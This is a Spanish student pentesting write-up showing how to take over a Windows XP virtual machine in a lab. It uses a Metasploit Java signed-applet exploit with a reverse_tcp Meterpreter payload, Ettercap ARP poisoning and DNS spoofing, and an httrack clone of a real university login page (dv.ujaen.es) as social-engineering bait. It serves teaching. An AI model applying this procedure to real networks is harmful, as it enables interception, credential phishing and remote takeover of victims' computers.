Está en la página 1de 25

Episodio de Pentesting

Helloworld,Imbacktrack












Nicols Moral de Aguilar
Seguridad en tecnologas de la informacin

2
ndice

1. Planteamiento del episodio
2. Conceptos necesarios
3. Confguracin del escenario
4. Escaneo a la vctma
5. Eleccin de vulnerabilidad
6. Confguracin del exploit
7. Envenenamiento DNS
8. Ingeniera social
9. Meterpreter en accin
Anexos




































3
1. Presentacin del episodio

En el episodio de penetracin que se expone a lo largo de este proyecto, se realizar una
explicacin detallada de cmo conseguir hacerse con un ordenador remoto aprovechando una
vulnerabilidad de Java en navegadores, que permite la ejecucin de cdigo malicioso tras aceptar
un applet de Java en cualquier navegador y/o sistema operatvo. As mismo, explicar el
procedimiento habitual en el que entra en juego la ingeniera social para hacer que las posibles
vctmas acepten la ejecucin del applet.
Para explicar el procedimiento, voy a especifcar varias fases por separado, que permitrn entender
de manera ms sencilla todo el proceso. En la primera fase, se debe realizar un escaneo de la LAN
en la que se sita el episodio para visualizar la estructura de la red y detectar posibles equipos
vulnerables. Ms tarde, hay que analizar los mismos para ver cmo y qu vulnerabilidades se
pueden aprovechar. Tras eso, se debe confgurar el exploit necesario para aprovechar dicha
vulnerabilidad, y dependiendo del tpo de exploit, habr que seguir un procedimiento para hacer
que el ataque se haga efectvo.

















4
2. Conceptos necesarios

Para la compresin de este proyecto necesitaremos tener algunas defniciones y conceptos claros,
as que voy a dar una breve explicacin de todos los trminos que considero necesarios para
entender el desarrollo del mismo.
Backtrack 5 R3
Distribucin de Linux basada en Ubuntu destnada a la seguridad. En su ltma versin incorpora las
versiones actualizadas de muchas de las utlidades de Linux ms usadas en el mbito de la
seguridad informtca. Abarca desde programas destnados al pentestng, como Metasploit
Framework o SET, pasando por herramientas de ingeniera inversa, como IDA Pro, de anlisis de
redes, como Nmap o AirCrack, o de anlisis forense, como Galleta. La distribucin se basa ms
concretamente en Ubuntu 10.04 LTS (Lucid Lynx) y est disponible en arquitecturas de 32, 64 bits y
en ARM. En el mbito de la seguridad, posiblemente sea la distribucin ms utlizada. Como dato
adicional, en todo el desarrollo del episodio os llamar la atencin la ausencia de sudo en los
comandos, pero la razn es que este sistema utliza la cuenta de administrador por defecto. En el
desarrollo del episodio, me referir a esto como Backtrack, BT o BT5.
Metasploit Framework
Es una herramienta imprescindible para cualquier informtco que trabaje con test de penetracin.
Metasploit o MSF, es un programa que recopila una base de datos de exploits autoactualizable que
permite aprovechar las posibles vulnerabilidades que tengan los equipos atacados. Junto con
NMap, se convierte en una herramienta increble. Adems, existe una interfaz grfca disponible
para los que odien la CLI (Command Line Interface), llamada Armitage, de la que hablar en uno de
los anexos del proyecto.
Etercap
Realiza las funciones de snifer, interceptor y registrador para cualquier LAN. Soporta direcciones
actvas y pasivas de varios protocolos, incluido SSH y HTTPS. Hace posible la inyeccin de datos en
una conexin establecida y permite el fltrado al vuelo aun manteniendo la conexin sincronizada
gracias a la caracterstca de realizar ataques MiTM (Man in the middle). Justamente esta ltma
caracterstca es la que a nosotros nos interesa para nuestra simulacin de escenario. Lo
explicaremos de forma ms extensa en el apartado de Envenenamiento de DNS
VB Bridged Network Mode
VirtualBox dispone de varios modos de confguracin de la tarjeta de red virtualizada de las guest.
Los ms usados suelen ser el modo NAT, que crea un puente de conexin entre el host, con IP
habitualmente de tpo 192.168.X.X y el guest, el cual se confgura en otra red 10.X.X.X. Y tambin se
usa habitualmente el modo red interna, que conecta directamente todas las guest en una misma
red. Sin embargo, puesto que el escenario precisa de actualizacin de diversos componentes dentro
de la VM, he confgurado la red como Bridged Network (Red Puenteada) que aade ambas VM a la
red local y les asigna, como es evidente, direcciones del tpo 192.168.X.X. Ello nos permitr tener

5
ambas mquinas virtuales conectadas, tanto la atacante como la atacada, y adems tener en ambas
conexin a internet para actualizar los componentes necesarios.
SET
Social Engineering Toolkit es una suite en CLI que nos facilita una interfaz en consola para
automatzar el uso de ataques de penetracin habituales compenetrando varias herramientas de la
distribucin, como pueden ser Metasploit, NMap, Apache Server, etc implementando en una
misma aplicacin la automatzacin de los ataques. Le echaremos un vistazo en el apartado de
anexos.
PAYLOAD
Es un trmino que se refere al cdigo o herramienta que tras la infeccin de una vctma, permite
realizar todo tpo de efectos secundarios. Es decir, la parte del troyano que se encarga de los
cambios de confguracin, y ejecucin de cualquier orden no legtma.
EXPLOIT
Es un sofware, o secuencia de comandos que se crea con el fn de causar un error o un fallo en
alguna aplicacin, a fn de causar un comportamiento no deseado o imprevisto en un sistema o
componente. Habitualmente supone la ejecucin remota de cdigo, la escalada de privilegios o
incluso un ataque DOS.














6
3. Confguracin del escenario

Para poner en marcha un escenario de una simulacin de un ataque de penetracin o pentestng,
vamos a utlizar dos mquinas virtuales interconectadas, las cuales vamos a confgurar de la manera
apropiada para que el ataque pueda llevarse a cabo de manera exitosa. Tras instalar VirtualBox,
vamos a necesitar una ISO de Windows XP SP3 y otra de Backtrack 5 R3 para instalar cada una en
una VM distnta.
(Proceso de instalacin de las dos VM)
Evidentemente, podemos usar versiones diferentes de ambos SO, pero en este caso he escogido las
versiones ms actualizadas de ambos. A contnuacin voy a mostrar la confguracin que he
dispuesto en cada una de los sistemas invitados.
Backtrack 5 R3, est instalado en un disco duro virtual y se le han asignado 512Mb de RAM. Incluso
es sufciente con bastante menos memoria puesto que el ataque que vamos a realizar no necesita
tener demasiados programas en memoria. En el momento de ms carga, deberan estar un servidor
Apache, MSF y Etercap. El sistema est actualizado con la siguiente lista de rdenes:
apt-get update && apt-get upgrade
msfupdate
Adems, tene actualizado SET a la ltma versin desde su propio men de opciones.
La mquina virtual est confgurada como Bridged Network por lo que se adhiere a la LAN a la que
pertenece el sistema host, con una IP del tpo 192.168.1.X
Windows XP SP3 contene las ltmas actualizaciones de Windows Update y est confgurado
tambin como Bridged Network, por lo que tene otra IP perteneciente a la red local del host.
Adems est instalado Google Chrome por si necesito hacer alguna bsqueda durante el desarrollo

7
del proyecto, y de paso para demostrar que independientemente del navegador instalado, el
sistema sigue siendo vulnerable, ya que la vulnerabilidad est en el JRE.
(Confguracin de red de ambas VM)
Con ambas mquinas virtuales funcionando y actualizadas correctamente, estamos listos para
entrar en materia e iniciar nuestro MSF. Como recomendacin adicional, propongo hacer una
Snapshot de ambas mquinas virtuales. No es estrictamente necesario ya que no vamos a tocar
nada relacionado con el kernel ni con el boot de BT5, y evidentemente Windows ya viene bien
capado de serie, pero es recomendable por si a alguien se le va la mano con la consola de
Meterpreter y teclea un rm r *.*.
Hasta nueva orden, la parte que viene a contnuacin se desarrolla de forma ntegra en la VM de
BT5, por lo que supongo la ejecucin de rdenes con sudo y que todas ellas se ejecutan en BT.













8
4. Escaneo a la vctma

Lo primero que necesitamos para poder hacer uso de nuestro supuesto exploit, y tras instalar las
herramientas necesarias en nuestra mquina, es seleccionar una o varias vctmas en las que tratar
de hacer efectvo el ataque. Para ello, y con el fn de escanear las posibles vulnerabilidades que
expongan a las vctmas ante nuestro ataque, necesitamos informacin sobre las direcciones a las
que vamos a atacar. Para ello, lo primero es ejecutar un anlisis de puertos. Y a estas alturas estaris
pensando en Nmap, la cual evidentemente podemos utlizar. As que sera bastante fcil ponernos
manos a la obra y ejecutar un escaneo generalizado con Nmap, del cual pondr un ejemplo
simplemente por lo que explicar a contnuacin.
Escaneo va Nmap
Ejecutamos en terminal la siguiente orden:
nmap A 192.168.1.26
(Orden ejecutada en BT5)
La orden anterior bsicamente realiza un scan rpido a la IP que especifcamos, en este caso
192.168.1.26, y aade un scan de SO con el atributo A. Habitualmente se usa tambin v para
visualizar ms informacin del proceso, pero puesto que es un ejemplo la he omitdo.

9
Escanear una red mediante Nmap es una forma totalmente vlida para lo que necesitamos en este
proceso, incluso podramos utlizar Zenmap que es la GUI de Nmap, pero para que se observe el
potencial de Metasploit, vamos a realizar el scan directamente desde el propio MSF, ya que incluye
mdulos de escaneo. Por tanto, iniciamos directamente la consola de Metasploit con
msfconsole y vemos que escaneos tenemos disponibles para realizar con los siguientes
comandos mostrados en la imagen siguiente. Los escaneos ms habituales son el TCP y el SYN, pero
como de momento solo necesito averiguar cul es la versin del SO, me vale cualquiera.
(Ejecutando SYN scan)
He confgurado el RHOST con la direccin del equipo atacado porque en este caso la sabemos. Pero
si quisiramos escanear una red, normalmente se realiza un scan a los equipos limitados por la
mscara de subred 255.255.255.0, es decir, desde 192.168.1.0 hasta 192.168.1.255. Se especifca
de la siguiente manera set RHOSTS 192.168.1.0/24.
Escaneamos el puerto 445 que viene abierto por defecto en todos los Windows ya que es utlizado
por SMB (Server Message Block, sistema para compartr archivos e impresoras de Microsof) y que
nos servir para saber la versin del sistema operatvo. Observamos que est abierto, por lo que
buscamos algn scan para SMB.


10
(Ejecutando SMB scan)
Una vez que sabemos el sistema operatvo que ejecuta el sistema en cuestn y hemos obtenido la
informacin adicional de puertos, debemos pasar a la elaboracin del plan de ataque, empezando
por la eleccin de la vulnerabilidad que vamos a utlizar.














11
5. Eleccin de vulnerabilidad

Gracias a MSF y su gigantesca base de datos de exploits funcionales, tenemos miles de
posibilidades para hacernos con un ordenador remoto. El momento de elegir que vulnerabilidad
vamos a aprovechar es importante, ya que marcar el rumbo del proceso para hacernos con la
mquina remota. En este caso, uno de los puntos ms importantes, es que la eleccin del exploit
debe realizarse pensando en el sistema operatvo de la vctma, y en los servicios que operan por
defecto en los puertos que hayamos detectado abiertos. Por tanto, podramos elegir
vulnerabilidades de diferentes clases.
Para Windows XP destacar el exploit ms08_067_netapi que ha sido uno de los ms utlizados
durante la vida de XP, ya que permite su ejecucin sin intervencin alguna del usuario remoto, por
lo que evita la ingeniera social. El exploit aprovecha las vulnerabilidades CVE-2006-4446 y CVE-
2006-4777 y permite la apertura incluso de una sesin de meterpreter, y la escalada de privilegios
en el sistema.
Sin embargo, debido a su compatbilidad con diferentes navegadores y sistemas operatvos, en este
escenario voy a utlizar la que posiblemente sea la vulnerabilidad ms utlizada de MSF,
Java_signed_applet. El exploit se inyecta en el servidor htp del atacante, junto con los payloads
generados para los diferentes sistemas operatvos, y permite la ejecucin de una sesin de
meterpreter, cuyas virtudes estudiaremos ms adelante, en la victma.
El exploit Java signed applet nos permite crear un complemento envenenado de java para el
navegador, que puede incluso frmarse si tenemos el JDK (Java Development Kit) instalado en la VM.
Este complemento se inyecta en el servidor web independientemente de la pgina web que haya
creada, lo cual es bastante interesante y aumenta con creces la maniobrabilidad de la ingeniera
social. Una vez hemos aceptado su ejecucin, el payload entrar en la VM vctma y se ejecutar,
creando una conexin reverse-tcp que se comunicar directamente con metasploit.











12
6. Confguracin del exploit

Lo primero que debemos hacer es llamar al exploit, pero si no nos sabemos la ruta exacta podemos
utlizar la funcin search de Metasploit. Se ve mejor en esta imagen:
(Confguracin bsica de Metasploit)
En la imagen de arriba podemos observar que si hacemos un show options, se nos muestran
los parmetros de confguracin modifcables para el exploit, y su confguracin por defecto. Al lado
de cada parmetro viene una breve descripcin del mismo, por lo que no me voy a extender
demasiado. Pero es importante echar un vistazo a SRVHOST, SRVPORT, LHOST y para este exploit en
concreto, podemos confgurar el nombre del applet malicioso modifcando APPLETNAME, e incluso
la frma del applet con CERTN. Los parmetros se modifcan como en el siguiente ejemplo:
set APPLETNAME EXPLOIT.
A contnuacin, la parte ms importante de la confguracin de un exploit consiste en la eleccin
del Payload, pues ser el programa que se encargar de realizar la conexin inversa desde la vctma
hasta el host. En este caso, vamos a utlizar el payload ms famoso de Metasploit que se llama
Meterpreter, y para ser ms exactos, en su versin de puertos TCP. Dicho esto, el paso siguiente es
setearlo en nuestro exploit, dando la siguiente instruccin:

13
set PAYLOAD windows/meterpreter/reverse_tcp
Una vez confgurado completamente el exploit con las opciones que necesitemos escribimos en la
consola de MSF exploit y automtcamente MSF montar el servidor web con el contenido
infectado. De forma predeterminada, MSF monta la inyeccin del exploit en una URL aleatoria del
tpo htp://127.0.0.1/XXXXXXX pero si queremos especifcar un nombre en la direccin tendremos
que confgurar URIPATH en la confguracin del exploit.
Ahora solo deberemos hacer que la vctma entre en el enlace y permita la instalacin del
complemento de Java. Para ello podramos hacer uso de ingeniera inversa, a travs de un mail o de
cualquier otro servicio, pero puesto que suponemos que la vctma est en la misma red local,
vamos a usar DNS Poisoning, lo que explicaremos a contnuacin.





















14
7. Envenenamiento DNS

A grandes rasgos un envenenamiento DNS, ms conocido por su traduccin en ingls DNS
Poissoning, es una forma de ataque MiTM en el que el atacante har que el PC atacado resuelva las
direcciones con un servidor de DNS alterado. Esto puede parecer un poco complejo al principio,
pero vamos a explicarlo de forma ms detallada.
Primero introduciremos un nuevo concepto que no se defni en el tutorial porque consider que
era ms conveniente verlo justo en el momento de su necesidad. As que a contnuacin se
explicar que es el Protocolo ARP (Adress Resoluton Protocol) y el envenenamiento de su cache.
Bsicamente es un protocolo responsable de encontrar la direccin MAC correspondiente a una
determinada IP. Imaginemos ordenador A y ordenador B.
ARP Request: El ordenador A pregunta en la red a quin pertenece una determinada IP, pongamos
192.168.1.1.
ARP Reply: Todos los dems ordenadores de la red ignorarn la petcin a excepcin del que tenga
esa direccin IP. Este ordenador contestar con un paquete que contendr la IP requerida y su
direccin MAC.
El protocolo fue diseado para ser simple y efciente pero su mayor defecto es la ausencia de
autentcacin. Como resultado, no hay manera de autentcar la IP con la direccin MAC contenida
en el ARP Reply. Adems, el host ni siquiera comprueba si fue enviada la respuesta ARP desde la
misma IP que se solicit en la petcin.
Esto quiere decir que si un ordenador A, enva una petcin y recibe una respuesta ARP, el protocolo
no puede comprobar si la IP corresponde con su MAC. Incluso si un host no envi una petcin ARP
pero si recibe una respuesta ARP, confa en la informacin de respuesta y actualiza su cache ARP.
Por tanto, como podemos observar parece fcil explotar el dbil protocolo ARP. Es posible enviar a
la red entera una respuesta ARP en la que cualquier IP est mapeada a cualquier MAC.
La vulnerabilidad anterior permite el ataque a una LAN de varias formas, en este caso, y como ya
hemos indicado anteriormente utlizaremos la tcnica Man in the Middle, que nos permitr hacer
snif a todo el trfco entre dos PC de la red.
Para conseguir esto, supongamos que mi PC es el host A, y mi router es el host B. Mi ordenador
tene una IP-A y una MAC-A, y el router una IP-B y una MAC-B.
La mquina C, o sea, la que realizar el ataque, enva una respuesta ARP a B que mapea IP-A con
MAC-C, y otra respuesta ARP hacia A que mapea IP-B con MAC-C. Por tanto ahora cualquier
paquete enviado desde A a B o desde B a A, llegar a C. Entonces es momento de actvar en C, IP
forwarding (Redireccionamiento IP), que permite redireccionar A a B. Es este momento cuando C se
encuentra justo en medio de la conexin entre A y B, y tenemos un ataque Man in the Middle en
toda regla.
Toda esta teora es imprescindible, pero creo que es hora de pasar a la prctca.

15
Os presento a Etercap, que nos permitr poner en prctca este ataque. En esta ocasin vamos a
utlizar la interfaz grfca por su comodidad, ya que es un rollazo aprenderse la ingente cantdad de
comandos que tene la CLI, y no es cmodo para trabajar. En caso de no querer iniciar Xorg,
podemos usar Etercap C, que funciona con una interfaz creada con curses. As que iniciamos
Etercap introduciendo en la terminal ettercap -G.
A contnuacin hacemos click en Snif -> Unifed Snifng y se nos abrir una ventana de seleccin
en la que podremos escoger cualquiera de las interfaces disponibles. Como estoy trabajando en VB,
elijo eth0.
(Etercap en modo Unifed Snifng)
Ahora vamos a escanear la red para ver los equipos, por lo que hacemos click en Hosts -> Scan for
host. Y cuando est completado en Hosts -> Host List. Ahora vemos informacin interesante, que
son todos los host de la red listados con direcciones MAC correspondientes. Nos disponemos a
hacer un ataque MiTM, por tanto seleccionamos un host y pulsamos en Add to Target 1 y
hacemos lo mismo con el otro host que queramos interceptar pero esta vez lo aadimos en Add to
Target 2.

16
(Seleccionando objetvos en Etercap)
Ahora seleccionamos Mitm -> Arp Poisoning y marcamos la opcin de Snif Remote Connecton.
Una vez hecho esto iniciamos el Snif desde Start -> Start Snifng
Una vez que los paquetes estn pasando por nuestro PC, lo que necesitamos es direccionar a la
vctma a la direccin IP en la que hemos inyectado el exploit, para ello lo que vamos a hacer es
redireccionar el DNS usando un plugin de Etercap que se llama dns-spoof. Pero antes debemos
editar el archivo de confguracin que Etercap dedica al dns. Si estis habituados al archivo de
Linux hosts (/etc/hosts) veris que la confguracin se hace del mismo modo, as que desde una
terminal nos vamos a editar el archivo de confguracin de DNS de Etercap.
nano /usr/local/share/ettercap/etter.dns
Aqu aadimos las lneas que queramos para redireccionar cualquier direccin a nuestra IP. Yo he
puesto la direccin de la UJA aadiendo esto:
*.ujaen.es A 192.168.1.27
ujaen.es A 192.168.1.27

17
Una vez hemos hecho eso, solo queda actvar el plugin, y todo estar listo, como podemos ver en la
siguiente imagen en la que se ve como haciendo un ping y entrando directamente en la web, nos
redirecciona correctamente a nuestro servidor malicioso.


























18
8. Ingeniera social

Durante el desarrollo del proyecto me estuve planteando la posibilidad de omitr este apartado. Sin
embargo despus de no pocas refexiones, creo que a nivel de poner en prctca este episodio en el
mundo real, esta es la parte ms importante. Se debe hacer caer a la vctma en la trampa, y una de
las maneras ms efcientes es suplantando la identdad de un sito web habitual de tal manera que
el usuario no se d cuenta de la trampa. Creo que estamos de acuerdo en que un index.html del
tpo <h1>HOLA, SI ACEPTAS ESTE APPLET VOY A HACKEARTE EL PC</h1> no es demasiado
tl.
Pero Y si clonamos la web de Google? Pens en clonar la UJA, pero la verdad es que ocupa
demasiado y tardaramos en descargar el rbol de direcciones bastante rato. Al fnal, decid
inyectarlo en un sito ms creble, ya que a da de hoy es improbable que Google inserte un applet
de Java en su buscador y me decid por inyectarlo justo en el enlace de autentcacin de
dv.ujaen.es, cambiando el link en el cdigo fuente hacia mi IP.
Me pongo manos a la obra, y aunque podra descargarme el cdigo directamente con wget o con
un right click en la misma web, o incluso copiando directamente el cdigo fuente visible, eso es una
chapuza a no ser que nos queramos pasar un par de horas redireccionando hojas de estlo y
contenido multmedia.
Descargamos un programa que se encarga de hacer la tarea por nosotros, htrack.
apt-get install httrack
Nos situamos en la carpeta que queramos descargar la web, y ejecutamos el programa pasando
como argumento la web que deseemos.
httrack dv.ujaen.es

(htrack clonando www.google.es)

19

Una vez copiada la web en la carpeta que hayamos defnido por defecto (recomiendo que no sea
directamente el servidor por si hay algn fallo) comprobamos que est bien en el navegador, y la
copiamos directamente a la carpeta del servidor apache, ya sea nicamente el index o tambin
archivos y carpetas asociados.
cp dv.ujaen.es/* /var/www
Una vez lo hemos copiado iniciamos el servidor apache desde el men.
Applicatons -> Backtrack -> Services -> HTTPD -> apache start
Bsicamente ya est todo copiado y listo para funcionar. Os adjunto como informacin adicional los
parmetros exactos que yo he utlizado para confgurar el exploit y el payload en MSF.
set APPLETNAME UJA_AUTH
set CERTCN Ujaen
set URIPATH /authapplet
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.XXX
(Hay que tener cuidado de no establecer como Puerto del servidor el 80, ya que lo estamos
utlizando para alojar a la web clonada)



20
9. Meterpreter en accin

Exploit inyectado en la web esperamos pacientemente que nuestra ingeniera social haga acto de
presencia ante la vctma y esta ejecute el complemento de Java. Una vez ejecutado, el applet se
encargar de realizar automtcamente una conexin inversa hacia nuestro servidor por el puerto
que hayamos especifcado en LPORT y abrir una sesin de Meterpreter para dejarnos en
ordenador atacado a nuestra disposicin.
Metasploit por defecto no nos redirige a la sesin abierta directamente, tendremos que abrirla
nosotros, as que vemos los comandos por defecto.
Primero, ejecutamos sessions l y nos listar todas las sesiones que hayan actvado nuestros
troyanos de conexin inversa. Para seleccionar una simplemente tenemos que escribir:

(Exploit actvando sesin y abrindola en meterpreter)
sessions i id es decir
sessions i 1
Se nos abrir una session de Meterpreter, y lo primero que tenemos que hacer tras examiner un
poquito la CLI, es ejecutar una orden help, para ver qu podemos hacer con l. En este momento,
los que no conozcan Meterpreter se darn cuenta de por qu he elegido este payload y no uno de
Shell normal. Meterpreter tene muchsimas opciones con rdenes directas, desde subir o
descargar un archivo, hasta terminar un proceso o capturar el micro o la webcam.
El payload es verdaderamente una obra de arte, podra explicar uno por uno que hace cada
comando, pero puesto que viene una descripcin del mismo en ingls creo que no tene sentdo y
es mucho ms divertdo si lo investgas t mismo.

21

(Algunos comandos de Meterpreter)














22
Anexos

Como informacin complementaria al proyecto, pero relatva al mismo, voy a presentaros dos
herramientas que os facilitarn el trabajo del da a da. Armitage y SET.

Armitage

Esta herramienta bsicamente se encarga de proveer de interfaz grfca a MSF, pero sin dejar de
lado una lnea de comandos. Armitage tene una barra superior que automatza el escaneo de
redes, la bsqueda de ataques disponibles para las distntas posibles vctmas dependiendo de la
informacin que consiga en los escaneos pertnentes. Adems, te permite elegir los ataques y te
ofrece una confguracin predeterminada para el mismo dependiendo del sistema operatvo de la
vctma. Su parte inferior, es una consola en la que se van abriendo pestaas para lanzar los
diferentes procesos durante el ataque. En cierto modo, como toda interfaz grfca, reduce
considerablemente las posibilidades del programa comparado con su interfaz CLI, pero ya que la
propia interfaz dispone de una lnea de comandos, podemos suplir las carencias de la interfaz desde
ah. La interfaz se lanza directamente desde el men de backtrack.

(Lanzando armitage desde el men)

23

(Ventana de metasploit habitual cuando se arranca)

(Ventana con un ataque en proceso, en la que hay vulnerados 3 dispositvos de la red)
Como podis ver la interfaz es bastante tl, y adems hace el ataque mucho ms vistoso si lo que
queris es hacer algn tpo de publicacin o documento ofcial.

24
SET

Cuyo nombre completo es Social Engineering Toolkit es un conjunto de utlidades como su propio
nombre indica que nos asiste en la tarea de poner en funcionamiento todo tpo de ataques en los
que interviene la ingeniera social, desde ataques vectoriales, hasta ataques como los de pass
harvestng o tabnabbing (El primero es captura de contraseas envenenando una petcin GET o
POST en nuestro servidor, y el segundo hace lo mismo pero carga el servidor malicioso al cambiar
de pestaa en el navegador de la vctma). Creado por David Kennedy, la verdad es que se ha
convertdo en una herramienta indispensable para cualquiera que trabaje en el rea de pentestng,
llegando incluso a portarse a un dispositvo iOS con Jailbreak. El sofware integra en muchas de sus
partes secciones del propio Metasploit, pero automatza la tarea hasta tal punto de basarse en un
men seleccionable con diferentes niveles. Tambin viene incluido en la distribucin de Backtrack.
Os dejo algunas imgenes.

(Men principal de SET)




25

(Men de ataques principal SET) (Seleccin de Payload SET)

También podría gustarte